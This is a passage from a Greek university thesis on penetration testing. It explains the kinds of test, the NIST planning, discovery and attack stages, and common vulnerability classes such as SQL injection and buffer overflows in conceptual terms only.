3 Lite διακρίνονται σε Bind, Double

Blind, Gray Box, Double Gray Box, Tandem και Reversal.

Εξωτερικοί έλεγχοι διείσδυσης (External penetration testing)

Οι εξωτερικοί έλεγχοι διείσδυσης πραγματοποιούνται έξω από την περίμετρο ασφάλειας του

οργανισμού που ελέγχεται. Αυτό παρέχει μια οπτική της ασφάλειας του οργανισμού όπως

δείχνει εξωτερικά, κυρίως από το Internet, με σκοπό να εντοπιστούν οι ευπάθειες οι οποίες

μπορούν να εκθέσουν το σύστημα σε ένα εξωτερικό επιτιθέμενο.

Οι εξωτερικοί έλεγχοι διείσδυσης χρησιμοποιούν τις μεθοδολογίες και τις τεχνικές που

χρησιμοποιούν και οι επιτιθέμενοι. Έτσι, αρχικά χρησιμοποιούνται τεχνικές αναγνώρισης

στόχου με τις οποίες αναζητούνται:

− δημόσια διαθέσιμα δεδομένα

− πληροφορίες για Domain Name Systems (DNS) εξυπηρετητών

− ανακοινώσεις σε newsgroup

− οποιαδήποτε δημοσιευμένη πληροφορία (ονόματα συστημάτων, διευθύνσεις ΙΡ,

λειτουργικά συστήματα, ονόματα υπευθύνων επικοινωνίας, κλπ)

Το επόμενο βήμα είναι ο προσδιορισμός των εξωτερικών κόμβων και των υπηρεσιών που

ακροάζονται, γι’ αυτό χρησιμοποιούνται τεχνικές ανίχνευσης και σάρωσης δικτύων. Επειδή

όμως πολλές φορές οι έλεγχοι αυτοί προσκρούουν σε μέτρα ασφάλειας όπως firewalls,

routers και λίστες ελέγχου προσπέλασης, ο ελεγκτής θα πρέπει να χρησιμοποιήσει τεχνικές

οι οποίες παρακάμπτουν αυτή την άμυνα. Έτσι, εξετάζει αν μπορεί να εισέλθει στο σύστημα

μέσα από πρωτόκολλα εφαρμογών που το επιτρέπουν όπως File Transfer Protocol (FTP),

Hyper Text Protocol (HTTP), Simple Mail Transfer Protocol (SMTP) και Post Office

Protocol (POP). Οι εξυπηρετητές, οι οποίοι είναι εξωτερικά προσπελάσιμοι, ελέγχονται για

ευπάθειες οι οποίες ενδεχομένως επιτρέπουν την πρόσβαση σε εσωτερικούς severs και

ιδιωτικές πληροφορίες.

44 Institute for Security and Open Methodologies, OSSTMM 3.0 Lite- Introduction and Sample to the Open Source Security Testing Methodology Manual, August 2009.

Page 80: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

80 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εσωτερικοί έλεγχοι διείσδυσης (Internal penetration testing)

Κατά την διενέργεια εσωτερικών ελέγχων διείσδυσης ο ελεγκτής προσλαμβάνει την ιδιότητα

ενός έμπιστου χρήστη του συστήματος του οργανισμού ή ενός επιτιθέμενου ο οποίος έχει

καταφέρει να διεισδύσει από την περίμετρο της ασφάλειας. Αυτό το είδος ελέγχου

διείσδυσης αποσκοπεί στο να ανακαλύψει ευπάθειες εντός των ορίων ασφαλείας του

συστήματος και να υποδείξει τις πιθανές επιπτώσεις από μια τέτοιου είδους επιτυχημένη

επίθεση. Εστιάζει στο επίπεδο ασφάλειας που χρησιμοποιεί το σύστημα, καθώς και στις

ρυθμίσεις ασφαλείας του, συμπεριλαμβανομένων των ρυθμίσεων των εφαρμογών και των

υπηρεσιών, της αυθεντικοποίησης, του ελέγχου προσπέλασης και της ανθεκτικότητάς του.

Στους ελεγκτές, οι οποίοι διενεργούν τον εσωτερικό έλεγχο διείσδυσης, χορηγούνται

δικαιώματα πρόσβασης απλού χρηστή και τους παρέχονται οι ανάλογες πληροφορίες. Τα

δικαιώματα πρόσβασης τα οποία παρέχονται στους ελεγκτές εξαρτώνται από τους στόχους

του ελέγχου διείσδυσης και μπορούν να αυξηθούν μέχρι το επίπεδο του διαχειριστή του

συστήματος ή του δικτύου. Από όποιο επίπεδο πρόσβασης όμως και αν εργάζονται,

προσπαθούν να αποκτήσουν περισσότερα δικαιώματα πρόσβασης ακολουθώντας την

ιεραρχική κλίμακα, π.χ. αν έχουν δικαιώματα απλού χρήστη να αποκτήσουν διαχειριστή ή

αν έχουν διαχειριστή συστήματος να αποκτήσουν δικαιώματα διαχειριστή domain.

Οι εσωτερικοί έλεγχοι διείσδυσης είναι περισσότερο ευέλικτοι σε σχέση με τους

εξωτερικούς γιατί πραγματοποιούνται στην εσωτερική περίμετρο της ασφάλειας, δηλαδή

πίσω από τα firewalls, τους routers και τα switches.

Εάν πρόκειται να χρησιμοποιηθούν και τα δύο είδη ελέγχων διείσδυσης είναι προτιμότερο

να πραγματοποιείται πρώτα ο εξωτερικός. Αυτό είναι ιδιαίτερα χρήσιμο εάν οι ίδιοι ελεγκτές

θα πραγματοποιήσουν και τα δύο είδη ελέγχων, οι οποίοι δεν θα πρέπει να γνωρίζουν την

εσωτερικοί διαμόρφωση του δικτύου, ακριβώς όπως και ένας πιθανός εισβολέας.

Φανεροί (Overt ή White box testing)

Η μέθοδος φανερού ελέγχου διείσδυσης περιλαμβάνει την εκτέλεση εξωτερικών ή/και

εσωτερικών ελέγχων με τη γνώση και τη συγκατάθεση των υπευθύνων του πληροφορικού

συστήματος του οργανισμού που ελέγχεται, επιτρέποντας την ουσιαστική αξιολόγηση του

επιπέδου ασφάλειας των δικτύων ή συστημάτων. Επειδή οι υπεύθυνοι του πληροφοριακού

συστήματος γνωρίζουν και συμμετέχουν στους ελέγχους, ενδεχομένως μπορούν να

παρέχουν οδηγίες για τον περιορισμό των πιθανών επιπτώσεων των ελέγχων στο σύστημα.

Page 81: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

81 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Οι έλεγχοι διείσδυσης παρέχουν επίσης μια ευκαιρία εκπαίδευσης για τους υπεύθυνους του

πληροφοριακού συστήματος οι οποίοι παρατηρούν τις δραστηριότητες και τις μεθόδους που

χρησιμοποιούνται από τους ελεγκτές για να αξιολογήσουν και να παρακάμψουν,

ενδεχομένως, τα εφαρμοσμένα μέτρα ασφάλειας. Αυτό δείχνει στους υπευθύνους του

πληροφοριακού συστήματος πόσο αποτελεσματικά είναι τα μέτρα ασφάλειας τα οποία έχουν

υλοποιήσει ενώ ταυτόχρονα τους διδάσκει πώς να διενεργούν ελέγχους διείσδυσης.

Συγκαλυμμένοι (Covert ή Black box testing)

Η μέθοδος συγκαλυμμένου ελέγχου διείσδυσης, υιοθετεί μια ανταγωνιστική προσέγγιση

σύμφωνα με την οποία οι έλεγχοι πραγματοποιούνται χωρίς να το γνωρίζουν οι υπεύθυνοι

του πληροφοριακού συστήματος του οργανισμού, αλλά με την πλήρη γνώση και την άδεια

της ανώτερης διοίκησης. Μερικοί οργανισμοί προσλαμβάνουν ένα έμπιστο τρίτο μέρος για

να εξασφαλίσουν ότι τα μέτρα προστασίας που εφαρμόζονται δεν έχουν ληφθεί χωρίς πρώτα

να εξεταστεί αν βρίσκεται σε εξέλιξη μια πραγματική επίθεση ή ένας έλεγχος διείσδυσης. Σε

αυτές τις περιπτώσεις, το έμπιστο τρίτο μέρος συνεργάζεται με τον ελεγκτή, τον υπεύθυνο

διοίκησης των ελέγχων, τους υπευθύνους του πληροφοριακού συστήματος και το

προσωπικό ασφάλειας που μεσολαβεί στις δραστηριότητες και διευκολύνει τις επικοινωνίες.

Αυτός ο τύπος ελέγχου είναι χρήσιμος για τους τεχνικούς ελέγχους ασφάλειας, την

απόκριση του προσωπικού ΙΤ στα περιστατικά ασφάλειας που συμβαίνουν, καθώς και τη

αξιολόγηση της γνώσης και της εφαρμογή της πολιτικής ασφαλείας του οργανισμού από το

προσωπικό. Οι έλεγχοι αυτοί μπορεί να διενεργηθούν με ή χωρίς προειδοποίηση.

Ο σκοπός των συγκαλυμμένων ελέγχων διείσδυσης είναι η εξέταση της καταστροφής ή της

επίπτωση που μπορεί να επιφέρει μια επίθεση στο πληροφορικό σύστημα του οργανισμού,

ενώ δεν εστιάζει στον προσδιορισμό των ευπαθειών του. Αυτή η μέθοδος ελέγχων

διείσδυσης δεν εξαντλείται στην εξέταση κάθε μέτρου προστασίας, κάθε ευπάθειας κάθε

συστήματος του οργανισμού. Εξετάζει τον οργανισμό από μια ανταγωνιστική άποψη, ενώ

συνήθως προσδιορίζει και εκμεταλλεύεται τις πιο στοιχειώδεις ευπάθειες για να αποκτήσει

πρόσβαση στο δίκτυο.

Blind

Ο ελεγκτής επικεντρώνεται στο στόχο χωρίς προηγούμενη γνώση των αμυντικών του

μηχανισμών, των αγαθών ή των καναλιών του. Ο στόχος είναι, ωστόσο, προετοιμασμένος

για τον έλεγχο, καθώς γνωρίζει από πριν κάθε λεπτομέρεια του ελέγχου. Ένας Blind έλεγχος

πρωταρχικά δοκιμάζει τις δεξιότητες του ελεγκτή. Το εύρος και το βάθος ενός τέτοιου

ελέγχου μπορεί να έχει τόση έκταση όση επιτρέπει η εφαρμόσιμη γνώση και δεξιότητα του

Page 82: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

82 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ελεγκτή. Συχνά ο έλεγχος αυτός αναφέρεται ως Ethical Hacking, War Gaming ή Role

Playing.

Double Blind

Ο ελεγκτής επικεντρώνεται στο στόχο χωρίς προηγούμενη γνώση των αμυντικών του

μηχανισμών, των αγαθών ή των καναλιών του. Ο στόχος δεν διαθέτει εκ των προτέρων

καμία γνώση για τους ελέγχους που πρόκειται να διενεργηθούν. Ένας έλεγχος Double Blind

δοκιμάζει τις ικανότητες του ελεγκτή και το κατά πόσο είναι προετοιμασμένος ο στόχος σε

σχέση με άγνωστες μεταβλητές μιας επίθεσης. Το εύρος και το βάθος ενός τέτοιου ελέγχου

μπορεί να έχει τόση έκταση όση επιτρέπει η εφαρμόσιμη γνώση και δεξιότητα του ελεγκτή.

Ο έλεγχος αυτός είναι γνωστός ως Black Box audit ή Penetration Test.

Gray box

Ο ελεγκτής επικεντρώνεται στο στόχο με περιορισμένη γνώση των αμυντικών του

μηχανισμών, των αγαθών και πλήρη γνώση των καναλιών. Ο στόχος είναι προετοιμασμένος

για τον έλεγχο, καθώς γνωρίζει από πριν κάθε λεπτομέρεια του ελέγχου. Ένας έλεγχος Gray

box δοκιμάζει τις ικανότητες του ελεγκτή και το κατά πόσο είναι προετοιμασμένος ο στόχος

σε σχέση με άγνωστες μεταβλητές μιας επίθεσης. Το εύρος και το βάθος εξαρτάται στην

ποιότητα της πληροφορίας που παρέχεται στον ελεγκτή πριν από τη δοκιμή, όπως επίσης και

στην εφαρμόσιμη γνώση του ελεγκτή. Αυτός ο τύπος δοκιμής συχνά αναφέρεται ως

Vulnerability Test και τις περισσότερες φορές διενεργείται από τον ίδιο το στόχο ως

αυτοαξιολόγηση της ασφάλειάς του.

Double Gray box

Ο ελεγκτής επικεντρώνεται στο στόχο με περιορισμένη γνώση των αμυντικών του

μηχανισμών, των αγαθών και πλήρη γνώση των καναλιών. Ο στόχος είναι εκ των προτέρων

ενημερωμένος για το σκοπό και το χρονικό πλαίσιο του ελέγχου, αλλά όχι για τα κανάλια

που θα ελεγχθούν ή για τους τομείς ελέγχου. Ένας έλεγχος Double Gray box δοκιμάζει τις

ικανότητες του ελεγκτή και το κατά πόσο είναι προετοιμασμένος ο στόχος σε σχέση με

άγνωστες μεταβλητές μιας επίθεσης. Το εύρος και το βάθος εξαρτάται από την ποιότητα της

πληροφορίας που παρέχεται στον ελεγκτή και το στόχο πριν από την επίθεση όπως επίσης

και από την εφαρμόσιμη γνώση του ελεγκτή. Αυτό είναι επίσης γνωστό ως έλεγχος White

Box.

Page 83: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

83 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Tandem

Ο ελεγκτής και ο στόχος είναι και οι δύο προετοιμασμένοι για τον έλεγχο, γνωρίζοντας εκ

των προτέρων όλες τις λεπτομέρειες του ελέγχου. Ένας τέτοιος έλεγχος δοκιμάζει την

προστασία και τους ελέγχους του στόχου. Ωστόσο, δεν μπορεί να ελέγξει το κατά πόσο ο

στόχος είναι προετοιμασμένος έναντι των αγνώστων μεταβλητών της επίθεσης. Η

πραγματική φύση της δοκιμής έγκειται στην προσοχή του ελεγκτή, καθώς αυτός διαθέτει

πλήρη εικόνα όλων των δοκιμών και της ανταπόκρισής τους. Το εύρος και το βάθος

εξαρτώνται από την ποιότητα της πληροφορίας που παρέχεται στον ελεγκτή πριν από τον

έλεγχο (διαφάνεια) όπως επίσης και από την εφαρμόσιμη γνώση του ελεγκτή. Ο έλεγχος

αυτός είναι συνήθως γνωστός ως In-House Audit ή Crystal Box Audit. Ο ελεγκτής είναι

συνήθως μέρος της διαδικασίας ασφάλειας.

Reversal

Ο ελεγκτής επικεντρώνεται στο στόχο με πλήρη γνώση των διαδικασιών του και της

λειτουργικότητας της ασφάλειας του, αλλά ο στόχος δεν γνωρίζει τίποτα για το πότε, το πώς

και τι θα ελεγχθεί. Η πραγματική φύση της δοκιμής είναι το να ελέγξει κατά πόσο ο στόχος

είναι προετοιμασμένος έναντι σε άγνωστες μεταβλητές είδη επιθέσεων. Το εύρος και το

βάθος εξαρτώνται από την ποιότητα της πληροφορίας που παρέχεται στον ελεγκτή πριν από

τον έλεγχο όπως επίσης και από την εφαρμόσιμη γνώση και δημιουργικότητα του ελεγκτή.

Συχνά αναφέρεται ως δοκιμή Red Team.

Εικόνα 3.1: Είδη Ελέγχων Τρωτότητας

Πηγή: OSSTMM 3.0 Lite, 2008

Page 84: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

84 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εάν ο στόχος του οργανισμού είναι να προσομοιώσει έναν συγκεκριμένο τύπο πιθανής

επίθεσης, αυτός ο τύπος δοκιμής απαιτεί ειδική μελέτη, τέτοια όπως η απόκτηση και

προτυποποίηση των στοιχείων απειλής.

Τα σενάρια τα οποία παράγονται παρέχουν μια γενική στρατηγική άποψη των πιθανών

μεθόδων εκμετάλλευσης, του κινδύνου, και των επιπτώσεων από μια εισβολή. Η μέθοδος

συγκαλυμμένου ελέγχου διείσδυσης συνήθως έχει προκαθορισμένα όρια, όπως ο

τερματισμός του ελέγχου όταν επιτευχθεί ένα ορισμένο επίπεδο πρόσβασης ή όταν ένας

ορισμένος τύπος καταστροφής είναι επιτεύξιμος στο επόμενο βήμα του ελέγχου. Η χρήση

τέτοιων ορίων αποτρέπει την πρόκληση καταστροφής δείχνοντας ταυτόχρονα, ότι η

καταστροφή θα μπορούσε να συμβεί.

Εκτός από την αποτυχία να προσδιοριστούν πολλές ευπάθειες, η μέθοδος συγκαλυμμένου

ελέγχου διείσδυσης είναι συχνά χρονοβόρα και δαπανηρή λόγω των απαιτήσεών της σε

μυστικότητα. Για να μπορέσει η ομάδα ελέγχου να λειτουργήσει σε ένα περιβάλλον

μυστικότητας, θα πρέπει να επιβραδύνει τις ανιχνεύσεις της καθώς και άλλες απαιτούμενες

ενέργειες και να μείνει «κάτω από το ραντάρ» του προσωπικού ασφαλείας του οργανισμού

στόχου.

Η μέθοδος φανερού ελέγχου διείσδυσης είναι λιγότερο δαπανηρή, εγκυμονεί λιγότερο

κίνδυνο από τη μέθοδο συγκεκαλυμμένου ελέγχου διείσδυσης και είναι η συχνότερα

χρησιμοποιούμενη. Όμως, η μέθοδος συγκεκαλυμμένου ελέγχου διείσδυσης παρέχει

καλύτερη ένδειξη για την καθημερινή ασφάλεια του οργανισμού στόχου, επειδή οι

διαχειριστές των συστημάτων δεν θα έχουν επιτείνει τη προσοχή τους εν’ όψη του ελέγχου.

3.3 Τα Στάδια Ενός Ελέγχου Διείσδυσης

Ένας έλεγχος διείσδυσης περιλαμβάνει τουλάχιστον τέσσερα διακριτά στάδια, όπως

φαίνονται και στην επόμενη εικόνα, χωρίς αυτό να σημαίνει ότι δεν μπορεί να περιλαμβάνει

και περισσότερα.

Page 85: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

85 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εικόνα 3.2: Τα 4 Στάδια του ελέγχου διείσδυσης

Πηγή: National Institute of Standards and Technology, 2008

Σχεδιασμός

Κατά τη φάση του σχεδιασμού ορίζονται οι κανόνες βάσει των οποίων θα διενεργηθούν οι

έλεγχοι διείσδυσης, καθορίζονται οι επιθυμητοί στόχοι, εξασφαλίζεται η αποδοχή του

σχεδίου από την διοίκηση του οργανισμού στον οποίο θα πραγματοποιηθεί ο έλεγχος, ενώ

τέλος οριστικοποιείται και τεκμηριώνεται εγγράφως το σχέδιο. Σε αυτή τη φάση δεν

πραγματοποιείται κανένας έλεγχος παρά τίθενται οι βάσεις για την επιτυχημένη διενέργειά

του.

Ανίχνευση

Η φάση ανίχνευσης του ελέγχου διείσδυσης αποτελείται από δύο μέρη. Κατά το πρώτο

μέρος διενεργείται ο έλεγχος ο οποίος περιλαμβάνει την συλλογή πληροφοριών και τη

σάρωση δικτύων και συστημάτων. Εκτός από τον προσδιορισμό θυρών και υπηρεσιών που

ακροάζονται, χρησιμοποιούνται και άλλες τεχνικές με σκοπό την συγκέντρωση

πληροφοριών για το δίκτυο στόχο όπως:

− Πληροφορίες για ονόματα Κόμβων και ΙΡ διευθύνσεις οι οποίες μπορούν να

συγκεντρωθούν μέσω πολλών μεθόδων, συμπεριλαμβανομένου της διερεύνησης DNS,

αναζητήσεις InterNIC (WHOIS), και network sniffing (γενικά μόνο κατά τη διάρκεια των

εσωτερικών δοκιμών)

− Πληροφορίες για ονόματα υπαλλήλων και υπευθύνων επικοινωνίας μπορούν να

συγκεντρωθούν με έρευνα σε εξυπηρετητές ιστού (web servers) του οργανισμού ή σε

καταλόγους των servers

− Πληροφορίες συστήματος, μπο ρο ύν να βρεθο ύν μέσω μεθό δων ό πως η απαρίθμηση

NetBIOS (γενικά μόνο κατά τη διάρκεια των εσωτερικών δοκιμών) και Network

Information System (NIS) (γενικά μόνο κατά τη διάρκεια των εσωτερικών δοκιμών)

− Πληροφορίες για εφαρμογές και υπηρεσίες, όπως οι αριθμοί έκδοσης, μπορούν να

βρεθούν μέσω της συλλογής banner.

Page 86: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

86 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Σε μερικές περιπτώσεις, τεχνικές όπως αναζήτηση στον κάδο ανακύκλωσης (dumpster

diving) και φυσικής διέλευσης των εγκαταστάσεων μπορούν να χρησιμοποιηθούν για να

συλλεχθούν πρόσθετες πληροφορίες για το δίκτυο στόχο, οι οποίες θα είναι χρήσιμες κατά

τη διάρκεια των δοκιμών διείσδυσης, όπως συνθηματικά τα οποία είναι γραμμένα σε χαρτί

και σε εμφανή θέση.

Το δεύτερο μέρος της φάσης ανίχνευσης είναι η ανάλυση ευπαθειών. Τα στοιχεία τα οποία

συλλέχθηκαν κατά τη σάρωση θυρών και υπηρεσιών (υπηρεσίες πο υ ακρο άζο νται,

εφαρμογές, λειτουργικό σύστημα, κλπ) συγκρίνονται για γνωστές ευπάθειές τους με

καταγραφές που υπάρχουν σε βάσεις δεδομένων ή αξιοποιείται η τεχνογνωσία των

ελεγκτών. Η σύγκριση με βάσεις δεδομένων μπορεί να γίνει με αυτοματοποιημένα εργαλεία.

Οι ελεγκτές επίσης μπορούν να χρησιμοποιήσουν τις δικές τους βάσεις δεδομένων - ή

δημόσιες βάσεις δεδομένων όπως η National Vulnerability Database (NVD) - για να

προσδιορίσουν τις ευπάθειες. Οι μη αυτοματοποιημένες διαδικασίες μπορούν να

προσδιορίσουν νέες ή όχι γνωστές ευπάθειες σε αντίθεση με τις αυτοματοποιημένες, αλλά

έχουν το μειονέκτημα να είναι περισσότερο χρονοβόρες.

Επίθεση

Η εκτέλεση μιας επίθεσης είναι η ουσία ενός οποιουδήποτε ελέγχου διείσδυσης. Στο

επόμενο σχήμα παρουσιάζονται τα μεμονωμένα βήματα της φάσης της επίθεσης.

Εικόνα 3.3: Βήματα Φάσης Επίθεσης με Ανατροφοδότηση της Φάσης Ανίχνευσης

Πηγή: National Institute of Standards and Technology, 2008

Page 87: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

87 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Η πιθανές ευπάθειες που προσδιορίσθηκαν στην προηγούμενη φάση δοκιμάζονται μια προς

μια, με σκοπό να εντοπιστεί αν κάποια από αυτές μπορεί να εκμεταλλευτεί από κάποιον

επιτιθέμενο και να εκθέσει σε κίνδυνο το σύστημα. Εάν μια επίθεση αποβεί επιτυχής, η

ευπάθεια καταγράφεται και προσδιορίζονται τα μέτρα προστασίας τα οποία είναι

απαραίτητα για τον περιορισμό των επιπτώσεών της στο σύστημα. Σε πολλές περιπτώσεις,

τα εργαλεία που χρησιμοποιούνται για τον προσδιορισμό των επιπτώσεων από την

εκμετάλλευση κάποιας ευπάθειας, αδυνατούν να προσδιορίσουν στο έπακρο το επίπεδο

πρόσβασης που μπορεί να αποκτήσει ένας εισβολέας στο σύστημα. Μπορούν άντ’ αυτού να

παρέχουν στους ελεγκτές καλύτερη γνώση του δικτύου στόχου και των ευπαθειών του και

να οδηγήσουν σε τροποποίηση των μέτρων προστασίας του.

Μερικά εργαλεία εκμετάλλευσης ευπαθειών επιτρέπουν στους ελεγκτές να κλιμακώσουν τα

προνόμιά τους στο σύστημα ή το δίκτυο ώστε να αποκτήσουν πρόσβαση σε πρόσθετους

πόρους. Εάν αυτό συμβεί, τότε απαιτείται πρόσθετη ανάλυση και έλεγχοι με σκοπό να

προσδιοριστεί το πραγματικό επίπεδο κινδύνου για το δίκτυο, όπως ο προσδιορισμός των

τύπων πληροφοριών που μπορούν να καταχωρηθούν, να τροποποιηθούν, ή να διαγραφούν

από το σύστημα. Σε περίπτωση όπου μια επίθεση στο σύστημα μέσω μιας συγκεκριμένης

ευπάθειας αποδειχτεί αδύνατη, ο ελεγκτής θα πρέπει να προσπαθήσει να εκμεταλλευτεί μια

άλλη ευπάθεια που έχει ανιχνευθεί.

Εάν ο ελεγκτής καταφέρει να εκμεταλλευτεί μια ευπάθεια και να εισέλθει στο σύστημα,

μπορεί να εγκαταστήσει σε αυτό πρόσθετα εργαλεία τα οποία χρησιμοποιούνται για να

αποκτήσει πρόσβαση σε πρόσθετα συστήματα ή πόρους του δικτύου, καθώς και σε

πληροφορίες για το δίκτυο ή τον οργανισμό. Κατά τη διάρκεια των ελέγχων είναι

απαραίτητο να διενεργούνται προσπάθειες διείσδυσης μέσω διαφόρων συστημάτων του

οργανισμού στόχου ώστε να καθοριστεί επακριβώς το επίπεδο πρόσβασης που μπορεί να

αποκτήσει ένας πιθανός εισβολέας. Αυτή η διαδικασία αντιπροσωπεύεται στην

ανατροφοδότηση του βρόχου στην εικόνα 3.1, μεταξύ της επίθεσης και της φάσης

ανίχνευσης ενός ελέγχου διείσδυσης.

Οι συνήθεις ευπάθειες των συστημάτων οι οποίες αξιοποιούνται κατά την διενέργεια

ελέγχων διείσδυσης μπορούν να κατηγοριοποιηθούν ως εξής:

− Αστοχίες ρυθμίσεων (Misconfigurations). Οι αστοχίες στη διαμόρφωση των ρυθμίσεων

ασφάλειας, ιδιαίτερα όταν διατηρούνται οι επισφαλείς προεπιλεγμένες κατασκευαστικές

ρυθμίσεις.

Page 88: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

88 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

− Kernel Flaws. Ο κώδικας του πυρήνα λειτουργικού συστήματος στον οποίο καθορίζεται

το γενικό πρότυπο ασφάλειας για το σύστημα, συχνά περιέχει ευπάθειες οι οποίες είναι

ικανές να εκθέσουν ολόκληρο το σύστημα σε κίνδυνο.

− Υπερχείλιση καταχωρητή (Buffer Overflows). Η υπερχείλιση καταχωρητή εμφανίζεται

όταν τα προγράμματα δεν ελέγχουν επαρκώς τα δεδομένα εισόδου για το κατάλληλο

μήκος. Εάν αυτό συμβεί, υπάρχει η πιθανότητα να εισαχθεί στο σύστημα αυθαίρετος

κώδικας και να εκτελεσθεί, εκμεταλλευόμενος συχνά τα δικαιώματα διαχειριστή του

τρέχοντος προγράμματος.

− Ανεπαρκής Επικύρωση Δεδομένων Εισαγωγής (Insufficient Input Validation).

Πολλές εφαρμογές αποτυγχάνουν να επικυρώσουν πλήρως τα δεδομένα εισαγωγή που

λαμβάνουν από τους χρήστες. Ένα παράδειγμα είναι μια εφαρμογή Ιστού η οποία δέχεται

ένα όρισμα από έναν χρήστη σε ένα επερώτημα βάσεων δεδομένων. Εάν ο χρήστης

εισάγει στις εντολές SQL αντί ή εκτός της ζητούμενης τιμής ένα άλλο όρισμα, και η web

εφαρμογή δεν φιλτράρει τις εντολές SQL, το επερώτημα μπορεί να εκτελεστεί με τις

κακόβουλες αλλαγές που ζητά ο χρήστης. Η διαδικασία αυτή είναι γνωστή ως SQL

injection επίθεση.

− Συμβολικές Συνδέσεις (Symbolic Links). Μια συμβολική σύνδεση (symlink) είναι ένα

αρχείο το οποίο δείχνει προς ένα άλλο αρχείο. Τα λειτουργικά συστήματα περιέχουν

προγράμματα τα οποία μπορούν να αλλάξουν τις άδειες που χορηγούνται σε ένα αρχείο.

Εάν αυτά τα προγράμματα τρέχουν με δικαιώματα διαχειριστή, ένας χρήστης θα

μπορούσε στρατηγικά να δημιουργήσει symlinks για να τα εξαπατήσει με σκοπό να

τροποποιήσει ή να απαριθμήσει κρίσιμα αρχεία των συστημάτων.

